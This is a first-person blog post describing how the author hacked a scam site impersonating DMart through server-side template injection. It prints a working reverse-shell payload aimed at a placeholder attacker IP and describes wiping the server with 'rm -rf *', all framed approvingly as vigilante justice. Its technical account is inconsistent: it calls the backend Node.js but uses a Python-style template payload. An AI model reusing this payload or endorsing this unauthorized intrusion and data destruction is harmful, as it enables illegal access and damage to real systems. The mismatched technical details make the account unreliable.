How I Hacked a Fake DMart Website
In March 2025, I came across a WhatsApp message being circulated widely. It claimed that DMart was offering free vouchers as part of a celebration. Curious and suspicious, I clicked on the link. It led me to a domain hosted on servio.io—clearly not DMart’s official website.
Scam Structure & User Journey
The landing page mimicked DMart branding and offered a fake promotional giveaway. Here’s how the scam was set up to manipulate users:
- Users were asked to answer three simple questions.
- Then they were told to choose one of the three mystery gift boxes.
- To receive their gift, users were forced to share the link with at least 5 WhatsApp contacts or groups.
It was clear this was a social engineering tactic to spread the scam virally. I decided to investigate further and try bypassing the sharing step using browser developer tools. By modifying the JavaScript in the console, I accessed the fake reward page directly—without sharing anything.
Reconnaissance & Exploit Hunting
I began testing the site using different vectors to find a potential vulnerability. Some of the methods I tried:
- Admin panel brute-forcing
- SQL injection in input fields
- Testing for insecure HTTP methods like PUT or TRACE
- Directory and file enumeration
None of these yielded results. But through response headers and error patterns, I found clues that the backend might be built with Node.js and used a templating engine. This opened the door to trying a Server-Side Template Injection (SSTI).
SSTI Vulnerability Confirmed
I injected the following payload in a user input field:
karthi{{7*7}}
To my surprise, the page rendered karthi49, confirming SSTI was present. This gave me code execution capability from the frontend to the server.
Executing a Reverse Shell
To explore further, I crafted a reverse shell payload using Python through SSTI and used Netcat on my VPS to listen for connections:
{
"name": "{{config.__class__.__init__.__globals__['os'].popen('bash -c \"bash -i >& /dev/tcp/MY_IP/MY_PORT 0>&1\"').read()}}",
"age": "24",
"ip": "IP_ADDRESS",
"gender": "male"
}Once the payload was submitted and triggered, I gained a reverse shell into the fake website’s server.
Exploring the Server
Inside the server, I found configuration files, an exposed .env file, and large logs that included IP addresses, mobile numbers, and submitted form data from innocent victims.
It was evident that the scammers were harvesting personal data for malicious purposes. This was no longer just a phishing site—it was a privacy breach affecting hundreds or possibly thousands.
Taking the Scam Site Down
After documenting everything and taking screenshots as evidence, I executed the following command to wipe the scam site:
rm -rf *
In moments, the fake DMart website was offline. I also reported the domain to the registrar and Indian cybercrime portal.
Lessons for the Community
- Always verify URLs—even if they look legitimate or are shared by someone you trust.
- Do not enter personal information on sites asking for “rewards.”
- Scammers often replicate trusted brands to fool users—awareness is the first defense.
- As cybersecurity professionals, we must act responsibly and legally while handling such threats.
